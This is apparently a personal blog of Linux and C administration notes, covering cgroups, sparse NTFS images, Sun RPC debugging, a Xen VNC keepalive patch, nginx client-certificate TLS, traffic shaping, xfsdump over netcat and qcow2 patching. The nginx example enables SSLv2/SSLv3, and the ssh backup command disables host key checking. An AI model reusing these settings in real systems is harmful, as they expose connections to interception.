HEADERS=$(wildcard ../*.h)
OBJECTS=$(patsubst %.c,%.o,$(wildcard *.c))
TO_TEST_OBJECTS=$(patsubst %.c,%.o,$(wildcard ../*.c))
MAIN_TST_OBJ=tst_main.o
BUILDLIBS=-lmysqlclient_r -lpthread

_TESTS=$(patsubst %.c,%,$(wildcard *.c))
TESTS=$(patsubst tst_main,,$(_TESTS))

all: $(OBJECTS) $(TESTS)

%.o: %.c $(HEADERS)
$(CC) $(CFLAGS) -c $<

$(TESTS): $(TO_TEST_OBJECTS) $(MAIN_TST_OBJ) $(OBJECTS)
    $(CC) $(CFLAGS) $(LDFLAGS) $(patsubst %,%.o,$@) $(TO_TEST_OBJECTS) $(MAIN_TST_OBJ) -o $@ $(BUILDLIBS)

clean:
    rm -f *~ *.o $(TESTS)
Note LDFLAGS=-Wl,--unresolved-symbols=ignore-all
Script to start tests test.sh
#!/bin/sh

for result in `find . -maxdepth 1 -perm /u=x,g=x,o=x -type f -name 'tst_*'`;
do
  $result
  exit_st=$?
  if [ $exit_st -eq 0 ]
  then
    echo $result : ok
  else
    echo $result : failed
  fi
done

Simplistic ORM like thing in C for MySQL

Take a look at extern_mysql.h and extern_mysql.c. It is a simple request to struct mapping done in C for MySQL 5.0 and above for one of the projects. libmysql_r is not the simplest thing to work with, code provided was tested in production, so it works, take a look if you had a bad day and were forced to get data from MySQL in C.

A few words about an interface. To get data from mysql:
1) add request to mb_mysql_stmt:
mb_mysql_stmt_t mb_mysql_stmt[] = {
    ...
    {
        "select * from SCHEDULE",
        NULL, NULL, sizeof(mb_db_schedule_t), bind_r_schedule
    },
    ...
};
where bind_r_schedule is a binding definition:
mb_bind_t   bind_r_schedule[] = {
    {"schedule_id",     offsetof(mb_db_schedule_t, schedule_id),        sizeof(((mb_db_schedule_t*)0)->schedule_id),    0},
    {"name",            offsetof(mb_db_schedule_t, name),               sizeof(((mb_db_schedule_t*)0)->name),           0},
    {"schedule_type",   offsetof(mb_db_schedule_t, schedule_type),      sizeof(((mb_db_schedule_t*)0)->schedule_type),  0},
    {"enabled",         offsetof(mb_db_schedule_t, enabled),            sizeof(((mb_db_schedule_t*)0)->enabled),        0},
    {"last_backup",     offsetof(mb_db_schedule_t, last_backup),        sizeof(((mb_db_schedule_t*)0)->last_backup),    0},
    {NULL, 0, 0, 0}
};
This means that mb_db_exec() will return an array of mb_db_schedule_t, each element of this array will correspond to one row in the result set. To map fields in result set to struct members bindings are used, consult C API Prepared Statement Type Codes to map mysql types to C ones (for MYSQL_TIME mb_time_t is defined). The length of the array will be stored in variable pointed by the count argument of the mb_db_exec() function.
If you want to get single value from db you can use, for instance
mb_bind_t   bind_r_config_value[] = {
    {"value",   0,  256, 0},
    {NULL, 0, 0, 0}
};
mb_mysql_stmt_t mb_mysql_stmt[] = {
    ...
    {
        "select value from CONFIG where `key`='address'",
        NULL, NULL, 256, bind_r_config_value
    },
    ...
};
We do not use struct and map the whole row to buffer of 256 bytes (256 is the max length of the value field in config table), to obtain results call
char *data;
data = mb_db_exec(mb_db_ip_address_stmt, NULL);
if (!data)
    mb_log_err("cannot find ip address");
Note that we do not need count here. Also note that bindings can be reused (bind_r_config_value can be used to obtain various values from config table).
2) add request number to mb_db_stmt_e enum:
typedef enum {
    ...
    mb_db_ip_address_stmt
} mb_db_stmt_e;

Cgroups, limit memory

If some application may eat a lot of memory and cause swapping you can put it to sandbox
Test app memtest.c
#include <stdlib.h>
#include <stdio.h>


int main() {
    int     i;
    void   *p;

    p = NULL;

    for (i = 0; 1; i+= 4096) {
        p = malloc(4096);
        if (!p) {
            perror("malloc");
            break;
        }
        printf("allocated %d bytes\n", i);
    }

}
Create new group and add to it current shell process
mkdir /sys/fs/cgroup/memory/0
echo $$ > /sys/fs/cgroup/memory/0/tasks
Configure memory limit
echo 4M > /sys/fs/cgroup/memory/0/memory.limit_in_bytes
Test
gcc memtest.c
./a.out
...
allocated 3997696 bytes
Killed
As you mentioned malloc didn't return NULL, app receives a signal and terminates because swap is not used and kernel kills one of the processes when there is no enough free memory left.

Prepare sparse raw image with ntfs

Create sparse file
dd if=/dev/zero of=test.img bs=1 count=0 seek=1995G
0+0 records in
0+0 records out
0 bytes (0 B) copied, 1.1611e-05 s, 0.0 kB/s
Create partition table
echo 'n
p
1


t
7
w
' | /sbin/fdisk -u test.img
Device contains neither a valid DOS partition table, nor Sun, SGI or OSF disklabel
Building a new DOS disklabel with disk identifier 0x2cddb521.
Changes will remain in memory only, until you decide to write them.
After that, of course, the previous content won't be recoverable.

Warning: invalid flag 0x0000 of partition table 4 will be corrected by w(rite)

Command (m for help): Partition type:
   p   primary (0 primary, 0 extended, 4 free)
   e   extended
Select (default p): Partition number (1-4, default 1): First sector (2048-4183818239, default 2048): Using default value 2048
Last sector, +sectors or +size{K,M,G} (2048-4183818239, default 4183818239): Using default value 4183818239

Command (m for help): Selected partition 1
Hex code (type L to list codes): Changed system type of partition 1 to 7 (HPFS/NTFS/exFAT)

Command (m for help): The partition table has been altered!

Syncing disks.
Format first partition
/sbin/kpartx -a test.img
/usr/sbin/mkntfs -c4096 -s512 -p63 -H255 -S63 -Ff --label Drive_E /dev/mapper/loop0p1
/sbin/kpartx -d test.img
loop deleted : /dev/loop0
Mount/umount first partition
/sbin/kpartx -a test.img
mkdir exposed
/usr/bin/ntfs-3g -o rw,noatime,force,entry_timeout=60000,negative_timeout=60000,attr_timeout=60000,ac_attr_timeout=60000 /dev/mapper/loop0p1 exposed
...
umount exposed
/sbin/kpartx -d test.img
loop deleted : /dev/loop0

How to debug Sun RPC

I bet you used to debug web services via some sniffer like wireshark. This is possible because of protocol simplicity (yes, event if it is SOAP with attachments it is still simple text xml based protocol).
Sun RPC is rather popular IPC mechanism on Linux, it reminds Java Sun RMI by its nature. Sun RPC is complex, binary and uses multiple connections. In brief there is an rpcbind daemon (or portmapper in other words) that is a registry of services, client asks rpcbind about port of specific service and then connects directly to service. For instance, NFS is build around Sun RPC, nfs-server uses 2049 port by default but it can be registered on any other port and clients still can find it by registry (nfs-utils prior to 1.2 has hardcoded 2049 port though).

So how to deal with this if you hit some trouble? There is an rpcdebug util
The rpcdebug command allows an administrator to set and clear the Linux kernel's NFS client and server debug flags. Setting these flags causes the kernel to emit messages to the system log in response to NFS activity; this is typically useful when debugging NFS problems.
rpcdebug -vh
usage: rpcdebug [-v] [-h] [-m module] [-s flags...|-c flags...]
       set or cancel debug flags.

Module     Valid flags
rpc        xprt call debug nfs auth bind sched trans svcsock svcdsp misc cache all
nfs        vfs dircache lookupcache pagecache proc xdr file root callback client mount all
nfsd       sock fh export svc proc fileop auth repcache xdr lockd all
nlm        svc client clntlock svclock monitor clntsubs svcsubs hostcache xdr all

rpcdebug -m rpc -s all
rpc        xprt call debug nfs auth bind sched trans svcsock svcdsp misc cache
See /var/log/syslog
...
Jan  6 13:40:58 HDC05 kernel: [1430624.387439] RPC:       set up transport to address addr=10.1.2.11 port=48355 proto=udp
Jan  6 13:40:58 HDC05 kernel: [1430624.387533] RPC:       created transport ffff88000eb2c000 with 16 slots
Jan  6 13:40:58 HDC05 kernel: [1430624.387588] RPC:       creating mount client for db01 (xprt ffff88000eb2c000)
Jan  6 13:40:58 HDC05 kernel: [1430624.387672] RPC:       creating UNIX authenticator for client ffff88002f863200
Jan  6 13:40:58 HDC05 kernel: [1430624.389041] RPC:     0 holding NULL cred ffffffffa0118da0
Jan  6 13:40:58 HDC05 kernel: [1430624.389091] RPC:       new task initialized, procpid 21435
Jan  6 13:40:58 HDC05 kernel: [1430624.389142] RPC:       allocated task ffff88002b3fe1c0
Jan  6 13:40:58 HDC05 kernel: [1430624.389192] RPC:   850 __rpc_execute flags=0x280
Jan  6 13:40:58 HDC05 kernel: [1430624.389240] RPC:   850 call_start mount3 proc NULL (sync)
Jan  6 13:40:58 HDC05 kernel: [1430624.389290] RPC:   850 call_reserve (status 0)
...

Xen VNC and stale tcp connections

The problem: in case vnc client terminates and doesn't send packet with FIN/RST flag (for instance, VNC connection was tunneled through VPN and tunnel was closed), connection on server side remains in ESTABLISHED state and one cannot connect to this VM via VNC again, see vnc stops working after a while.
The solution of this simple problem is a bit complicated. First of all tcp keepalive on vnc server socket should be turned on, in other words one must patch qemu-dm that implements VNC in Xen (Xen Opensource 3.4.2).
diff -u -x '*.o' -x '*.o.d' xen-3.4.2/tools/ioemu-qemu-xen/osdep.c xen-3.4.2_fix/tools/ioemu-qemu-xen/osdep.c
--- xen-3.4.2/tools/ioemu-qemu-xen/osdep.c      2009-11-05 11:44:56.000000000 +0000
+++ xen-3.4.2_fix/tools/ioemu-qemu-xen/osdep.c  2011-12-28 13:43:29.938649747 +0000
@@ -338,4 +338,11 @@
     f = fcntl(fd, F_GETFL);
     fcntl(fd, F_SETFL, f | O_NONBLOCK);
 }
+
+int socket_set_keepalive(int fd) {
+    int optval;
+    
+    optval = 1;
+    return setsockopt(fd, SOL_SOCKET, SO_KEEPALIVE, &optval, sizeof(optval));
+}
 #endif
diff -u -x '*.o' -x '*.o.d' xen-3.4.2/tools/ioemu-qemu-xen/qemu_socket.h xen-3.4.2_fix/tools/ioemu-qemu-xen/qemu_socket.h
--- xen-3.4.2/tools/ioemu-qemu-xen/qemu_socket.h        2009-11-05 11:44:56.000000000 +0000
+++ xen-3.4.2_fix/tools/ioemu-qemu-xen/qemu_socket.h    2011-12-28 13:43:32.788255661 +0000
@@ -41,6 +41,7 @@
 
 /* misc helpers */
 void socket_set_nonblock(int fd);
+int socket_set_keepalive(int fd);
 int send_all(int fd, const void *buf, int len1);
 
 /* New, ipv6-ready socket helper functions, see qemu-sockets.c */
diff -u -x '*.o' -x '*.o.d' xen-3.4.2/tools/ioemu-qemu-xen/vnc.c xen-3.4.2_fix/tools/ioemu-qemu-xen/vnc.c
--- xen-3.4.2/tools/ioemu-qemu-xen/vnc.c        2009-11-05 11:44:56.000000000 +0000
+++ xen-3.4.2_fix/tools/ioemu-qemu-xen/vnc.c    2011-12-28 13:44:59.283974757 +0000
@@ -2389,6 +2389,8 @@
        VNC_DEBUG("New client on socket %d\n", vs->csock);
        dcl->idle = 0;
         socket_set_nonblock(vs->csock);
+    if (socket_set_keepalive(vs->csock) == -1)
+        VNC_DEBUG("Cannot set KEEPALIVE on socket %d\n", vs->csock);
        qemu_set_fd_handler2(vs->csock, NULL, vnc_client_read, NULL, opaque);
        vnc_write(vs, "RFB 003.008\n", 12);
        vnc_flush(vs);
Recompile xen tools (make tools, see xen README) and replace qemu-dm executable with dist/install/usr/lib64/xen/bin/qemu-dm.
Configure linux kernel
HDC11:~# sysctl -a | grep ipv4.tcp_keep
net.ipv4.tcp_keepalive_time = 30
net.ipv4.tcp_keepalive_probes = 5
net.ipv4.tcp_keepalive_intvl = 10
This means in case there are no packets during 30 secs send empty packet, if no ACK received send 5 packets every 10 secs, if still no answer send RST and close connection.
Test
HDC11:~# netstat -nap | grep 5901
tcp 0 0 0.0.0.0:5901 0.0.0.0:* LISTEN 28905/qemu-dm
HDC11:~# netstat -nap | grep 5901
tcp 0 0 0.0.0.0:5901 0.0.0.0:* LISTEN 28905/qemu-dm
tcp 0 0 10.10.17.11:5901 10.10.17.216:1334 ESTABLISHED 28905/qemu-dm <---- VNC connection via VPN
HDC11:~# tcpdump -n -i eth2 port 1334
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth2, link-type EN10MB (Ethernet), capture size 96 bytes
07:42:15.119612 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1601431976 win 5840
07:42:15.316704 IP 10.10.17.216.1334 > 10.10.17.11.5901: . ack 1 win 64228
07:42:45.319980 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840 <--- acks every 30 secs
07:42:45.701610 IP 10.10.17.216.1334 > 10.10.17.11.5901: . ack 1 win 64228 <--- response to ack
07:43:15.700307 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840 <--- kill vpn, no response anymore
07:43:25.700398 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840
07:43:35.700586 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840
07:43:45.700639 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840
07:43:55.700765 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840 <--- 5 probes every 10 secs
07:44:05.700913 IP 10.10.17.11.5901 > 10.10.17.216.1334: R 1:1(0) ack 1 win 5840 <--- still no response, RST
^C
10 packets captured
10 packets received by filter
0 packets dropped by kernel
HDC11:~# netstat -nap | grep 5901
tcp 0 0 0.0.0.0:5901 0.0.0.0:* LISTEN 28905/qemu-dm
<--- no ESTABLISHED connections
HDC11:~# telnet localhost 5901 <--- we can connect to this port again
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
RFB 003.008 <--- server responds
^]
telnet> quit
But we need to go deeper. Tcp keepalive works only when there are no packets on the wire. Imagine VNC server sent some packet and connection terminated in silent way (i.e. it didn't receive ACK in his packet). In this case linux will try to resend packet until RTO.
07:57:36.123013 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1557:1598(41) ack 377 win 5840
07:57:36.317922 IP 10.10.17.216.1421 > 10.10.17.11.5901: P 377:387(10) ack 1598 win 63353 <--- here we lost connection
07:57:36.360862 IP 10.10.17.11.5901 > 10.10.17.216.1421: . ack 387 win 5840 07:58:06.317741 IP 10.10.17.11.5901 > 10.10.17.216.1421: . ack 387 win 5840
07:58:16.321445 IP 10.10.17.11.5901 > 10.10.17.216.1421: . ack 387 win 5840
07:58:16.932260 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 <--- vnc server (qemu-dm) tries to send some data
07:58:17.621451 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 <--- retransmit algorithm starts with dynamic growing intervals
07:58:19.001467 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
07:58:21.761500 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
07:58:27.281590 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
07:58:38.321648 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
07:59:00.401919 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
07:59:44.562552 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
08:01:12.883584 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
08:03:12.885069 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
08:05:12.886487 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
08:07:12.887861 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
08:09:12.889364 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
08:11:12.890812 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
08:13:12.892282 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
08:15:12.893702 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
<--- ok, now reno gives up, connection is closed after ~15 mins
HDC11:~# netstat -nap | grep 5901
tcp 0 0 0.0.0.0:5901 0.0.0.0:* LISTEN 28905/qemu-dm
15 mins without ability to connect to VM is too long for client. Configure kernel again - decrease /proc/sys/net/ipv4/tcp_retries2 (net.ipv4.tcp_retries2) from 15 to 5 tries.
09:05:45.286580 IP 10.10.17.216.1312 > 10.10.17.11.5901: P 84:94(10) ack 3649 win 63679
09:05:45.320669 IP 10.10.17.11.5901 > 10.10.17.216.1312: . ack 94 win 5840
09:06:15.281030 IP 10.10.17.11.5901 > 10.10.17.216.1312: . ack 94 win 5840
09:06:25.281213 IP 10.10.17.11.5901 > 10.10.17.216.1312: . ack 94 win 5840
09:06:25.961866 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840
09:06:26.661261 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840
09:06:28.061265 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840
09:06:30.861301 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840
09:06:36.461346 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840
09:06:47.661424 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840
~60-90 secs
As a result one can reestablish connection to VNC in 1-2 mins.

Note, one can kill stale connection with the help of netfilter by setting conntrack net.netfilter.nf_conntrack_tcp_timeout_established to 1-2 hours (default is 5 days). After this time elapses iptables will send RST in both directions. But one still need to set proper net.ipv4.tcp_retries2.

Nginx, two-way ssl authentication

See Mutual authentication or two-way authentication.
  1. Client has X509 cert and private key.
  2. Server has its own cert and key and client cert.
  3. At connection establishing time server checks client cert and client checks server cert. Server also knows client name after auth.
On server side compile nginx (nginx-1.1.11) --with-http_ssl_module. For server we'll create cert and key
openssl genpkey -algorithm RSA -out cert.key
openssl req -new -x509 -key cert.key -out cert.pem
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (eg, YOUR name) []:localhost
Email Address []:
Note, Common Name must be equal to domain name.
Nginx config excerpt
server {
    listen       443;
    server_name  localhost;

    ssl                 on;
    ssl_certificate     cert.pem;
    ssl_certificate_key cert.key;

    ssl_session_timeout  5m;

    ssl_protocols  SSLv2 SSLv3 TLSv1;
    ssl_ciphers  HIGH:!aNULL:!MD5;
    ssl_prefer_server_ciphers   on;

    location / {
        root   html;
        index  index.html index.htm;
    }
}
Test
curl -k -i https://localhost/
HTTP/1.1 200 OK
Server: nginx/1.1.11
Date: Fri, 16 Dec 2011 11:56:28 GMT
Content-Type: text/html
Content-Length: 151
Last-Modified: Fri, 16 Dec 2011 10:49:22 GMT
Connection: keep-alive
Accept-Ranges: bytes

<html>
<head>
<title>Welcome to nginx!</title>
</head>
<body bgcolor="white" text="black">
<center><h1>Welcome to nginx!</h1></center>
</body>
</html>
The -k parameter must be specified because server cert is self-signed, see curl(1).
-k/--insecure
(SSL) This option explicitly allows curl to perform "insecure" SSL connections and transfers. All SSL connections are attempted to be made secure by using the CA certificate bundle installed by default. This makes all connections considered "insecure" fail unless -k/--insecure is used.
This was one-way ssl. Add following lines to config to require client cert
server {
    ...
    ssl_verify_client on;
    ssl_client_certificate client.pem;
    ...
}
Test
curl -k -i https://localhost/
HTTP/1.1 400 Bad Request
Server: nginx/1.1.11
Date: Fri, 16 Dec 2011 12:09:38 GMT
Content-Type: text/html
Content-Length: 253
Connection: close

<html>
<head><title>400 No required SSL certificate was sent</title></head>
<body bgcolor="white">
<center><h1>400 Bad Request</h1></center>
<center>No required SSL certificate was sent</center>
<hr><center>nginx/1.1.11</center>
</body>
</html>


curl -k -i --cert cert.pem --key cert.key https://localhost/
HTTP/1.1 200 OK
Server: nginx/1.1.11
Date: Fri, 16 Dec 2011 12:01:56 GMT
Content-Type: text/html
Content-Length: 151
Last-Modified: Fri, 16 Dec 2011 10:49:22 GMT
Connection: keep-alive
Accept-Ranges: bytes

<html>
<head>
<title>Welcome to nginx!</title>
</head>
<body bgcolor="white" text="black">
<center><h1>Welcome to nginx!</h1></center>
</body>
</html>
User agents (google-chrome, firefox, others) often use PKCS#12 format (files with .p12 extension). One can convert pair cert.pem/cert.key into PKCS#12 via openssl
openssl pkcs12 -export -in cert.pem -inkey cert.key -out cert.p12
Then import cert.p12 into browser and go to https://localhost/. Note, use certificate chains and one certificate as root for all client certs, nginx will authenticate clients against this certificate.

Monday, December 23, 2013

Debug and profile erlang linked in driver

OTP tools like fprof refuse to profile your .so (for a good reason). So how to do this?
erl is like any other executable loads linked in driver as a shared library and one can intorspect this shared library like any other. During compilation one need to add debug info to .so file (-ggdb flag for gcc) then attach to running erlang virtual machine from gdb or kdbg or similar.
> ps ax | grep erlang
 9801 pts/1    Sl+    0:00 /usr/lib64/erlang/erts-5.8.1/bin/beam.smp -K true -- -root /usr/lib64/erlang -progname erl -- -home /home/adolgarev --
11208 pts/0    S+     0:00 grep erlang
> kdbg -p 9801 /usr/lib64/erlang/erts-5.8.1/bin/beam.smp
Now breakpoints can be added and program state inspected
To profile do the following
valgrind --tool=callgrind --trace-children=yes /usr/bin/erl
Run tests, grab callgrind.out.PID, open it in kcachegrind
In this particular example you can see cons (|) for list creation is really slow (procedure ei_x_encode_list_header). Knowing list size beforehand decreases caller relative execution time from 34.45% to 23.25%.
Note that profiling is not a sign of premature optimization but also a sanity check that you do not do some insane things.

How to limit network bandwidth and introduce latency

So you want to test clients of some service like nfs in case network or service is slow. In order to do this you need to limit network throughput, introduce latency and jitter (latency variation). Ok, I bet you know how to do this
tc qdisc add dev eth0 root handle 1: prio
tc qdisc add dev eth0 parent 1:3 handle 30: tbf rate 1mbit buffer 10kb limit 3000
tc qdisc add dev eth0 parent 30:1 handle 31: netem delay 100ms 10ms distribution normal
tc filter add dev eth0 protocol ip parent 1:0 prio 3 u32 match ip dst 192.168.44.4/32 flowid 1:3
See Linux Advanced Routing & Traffic Control HOWTO.
Simple test. On server side
iperf -s
------------------------------------------------------------
Server listening on TCP port 5001
TCP window size: 85.3 KByte (default)
------------------------------------------------------------
[  4] local 192.168.44.4 port 5001 connected with 192.168.44.26 port 37494
[ ID] Interval       Transfer     Bandwidth
[  4]  0.0-14.6 sec  1.52 MBytes    870 Kbits/sec
On client side
iperf -c 192.168.44.4
------------------------------------------------------------
Client connecting to 192.168.44.4, TCP port 5001
TCP window size: 16.0 KByte (default)
------------------------------------------------------------
[  3] local 192.168.44.26 port 37494 connected with 192.168.44.4 port 5001
[ ID] Interval       Transfer     Bandwidth
[  3]  0.0-11.8 sec  1.52 MBytes  1.08 Mbits/sec
Cleanup
tc qdisc del dev eth0 root

How to backup sparse file over network

Rsync will drive CPU or IO crazy. One needs to use fs specific utils to perform this kind of task. For instance, for XFS one can use xfsdump and xfsrestore via ssh tunnel
/usr/bin/ssh -o 'UserKnownHostsFile /dev/null' -o 'StrictHostKeyChecking no' -o 'ExitOnForwardFailure yes' -L1234:localhost:1234 test@192.168.14.189 'netcat -l -v -p 1234 | /sbin/xfsrestore - /home/bckp'
Restore Status: SUCCESS

/sbin/xfsdump -s /a/b/c -F - /home | netcat localhost 1234
Dump Status: SUCCESS
Things to note.
  1. ssh options 'UserKnownHostsFile /dev/null' and 'StrictHostKeyChecking no' omit known_hosts check, see ssh_config(5).
  2. ssh option 'ExitOnForwardFailure yes' forces ssh to exit with error if it failed to forward ports.
  3. carefully with netcat, it has 2 different cli.
  4. see xfsdump(8) and xfsrestore(8).

How to change path to backing file in qcow2

Standard utility cannot do this. Take C and qcow2 image format doc and write something like
#define ntohll(x) (((uint64_t)(ntohl((uint32_t)((x << 32) >> 32))) << 32) | ntohl(((uint32_t)(x >> 32))))


/* change filename in qcow2 */
int backing_file_patch(const char *in_file, const char *new_backing_file) {
    
    int f;
    uint64_t backing_file_offset;
    uint32_t backing_file_size;
        
    if ((f = open(in_file, O_RDWR)) == -1) {
        perror("open");
        goto error;
    }
    
    if (lseek(f, 8, SEEK_SET) == (off_t)-1) {
        perror("lseek");
        goto error;
    }

    if (read(f, &backing_file_offset, sizeof(backing_file_offset)) == -1) {
        perror("read");
        goto error;
    }
    backing_file_offset = ntohll(backing_file_offset);
    
    backing_file_size = strlen(new_backing_file);
    backing_file_size = htonl(backing_file_size);
    
    /* update backing_file_size */
    if (write(f, &backing_file_size, sizeof(backing_file_size)) == -1) {
        perror("write");
        goto error;
    }
    
    /* update path */
    if (lseek(f, backing_file_offset, SEEK_SET) == (off_t)-1) {
        perror("lseek");
        goto error;
    }
    if (write(f, new_backing_file, strlen(new_backing_file)) == -1) {
        perror("write");
        goto error;
    }
        
    close(f);
    return 0;
    
error:
    close(f);
    return 1;
}
To test this
/usr/sbin/xm block-attach 0 tap:qcow2:/home/test/vm_drive_C_snapshot.qcow2 /dev/xvda w 0
/bin/ntfs-3g -o dev_offset=7340032,rw,noatime,force,entry_timeout=60000,negative_timeout=60000,attr_timeout=60000,ac_attr_timeout=60000 /dev/xvda exposed
Cleanup
/bin/umount exposed
/usr/sbin/xm block-detach 0 51712

Sunday, December 22, 2013

Don't parse output from system utilities

One often can see that some system utility returns information he needs. Then he does a wrong thing: parses output from this utility. We'll do opposite. For instance, we'll get broadcast address
/sbin/ifconfig eth1
eth1      Link encap:Ethernet  HWaddr 00:0A:CD:14:CD:77  
          inet addr:192.168.44.177  Bcast:192.168.44.255  Mask:255.255.255.0
          inet6 addr: fe80::20a:cdff:fe14:cd77/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:791580 errors:0 dropped:0 overruns:0 frame:0
          TX packets:381581 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:468681235 (446.9 Mb)  TX bytes:47469801 (45.2 Mb)
          Interrupt:18 Base address:0xc000
What does ifconfig do to get this info?
strace /sbin/ifconfig eth1
...
socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
...
ioctl(4, SIOCGIFBRDADDR, {ifr_name="eth1", ifr_broadaddr={AF_INET, inet_addr("192.168.44.255")}}) = 0
...
strace shows that descriptor 4 is passed to ioctl. In python one can do the same
# get the constant beforehand
grep -R SIOCGIFBRDADDR /usr/include/*                         
/usr/include/bits/ioctls.h:#define SIOCGIFBRDADDR  0x8919  /* get broadcast PA address */


import fcntl, socket, struct
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_IP)
SIOCGIFBRDADDR = 0x8919
iface = struct.pack('256s', 'eth1')
info = fcntl.ioctl(s.fileno(), SIOCGIFBRDADDR, iface)
socket.inet_ntoa(info[20:24])
'192.168.44.255'
Why we get bytes from 20 to 24? One passes struct ifreq to ioctl (see netdevice(7)), IFNAMSIZ is 16, plus offsetof(struct sockaddr_in, sin_addr), this equals to 20, and plus unsigned long that is 4 bytes.
struct ifreq {
    char ifr_name[IFNAMSIZ]; /* Interface name */
    union {
        struct sockaddr ifr_addr;
        struct sockaddr ifr_dstaddr;
        struct sockaddr ifr_broadaddr;
        struct sockaddr ifr_netmask;
        struct sockaddr ifr_hwaddr;
        short           ifr_flags;
        int             ifr_ifindex;
        int             ifr_metric;
        int             ifr_mtu;
        struct ifmap    ifr_map;
        char            ifr_slave[IFNAMSIZ];
        char            ifr_newname[IFNAMSIZ];
        char *          ifr_data;
    };
};
struct sockaddr_in {
    short            sin_family;
    unsigned short   sin_port;
    struct in_addr   sin_addr;
    char             sin_zero[8];
};
struct in_addr {
    unsigned long s_addr;
};
Note, there are no holes in these structs. One can expect 4 byte hole before sin_addr on 64 bit systems, but there is no. Those structures are declared in a way that omits holes. A simple test to show
#include <stdio.h>
#include <stddef.h>

#include <netinet/in.h>


struct in_addr2 {
    unsigned long s_addr;
};
struct sockaddr_in2 {
    short            sin_family;
    unsigned short   sin_port;
    struct in_addr2  sin_addr;
    char             sin_zero[8];
};

int main(void) {
    printf("%d\n", offsetof(struct sockaddr_in, sin_addr));
    printf("%d\n", offsetof(struct sockaddr_in2, sin_addr));
    return 0;
}

gcc 1.c
./a.out
4
8
With the help of strace you can find out a lot about utilities, one more example
strace ps
...
open("/proc", O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC) = 5
fcntl(5, F_GETFD)                       = 0x1 (flags FD_CLOEXEC)
getdents64(5, /* 211 entries */, 32768) = 5552
stat("/proc/1", {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0
open("/proc/1/stat", O_RDONLY)          = 6
read(6, "1 (init) S 0 1 1 0 -1 4202752 31"..., 1023) = 187
close(6)                                = 0
open("/proc/1/status", O_RDONLY)        = 6
read(6, "Name:\tinit\nState:\tS (sleeping)\nT"..., 1023) = 675
close(6)
stat("/proc/2", {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0
... 
So, the advice is to not parse output from utilities, it is not reliable thing to do, it is a subject to change. Use ioctl, sysctl, /proc, etc. to gather info you need. Use strace and others to find out what you need.

P.S. The funniest bug I've seen is when one mixed stdout and stderr and got every time new result upon parsing due to two streams are mixed in an unpredictable way. The other one was due to i18n feature.

Linux, reboot --force

If you cannot reboot your system (e.g. cannot umount some device due to its malfunction or network loss during work with remote hard drive) use Magic SysRq key
The magic SysRq key is a key combination understood by the Linux kernel, which allows the user to perform various low level commands regardless of the system's state.
Kernel must have been compiled with CONFIG_MAGIC_SYSRQ
cat /boot/config-`uname -r` | grep CONFIG_MAGIC_SYSRQ
CONFIG_MAGIC_SYSRQ=y
To actually reboot
echo 1 > /proc/sys/kernel/sysrq
echo b > /proc/sysrq-trigger

Best template lib for C

You've seen or heard about Clearsilver, CTPP, libctemplate. But the best template lib which has C spirit is libtemplate
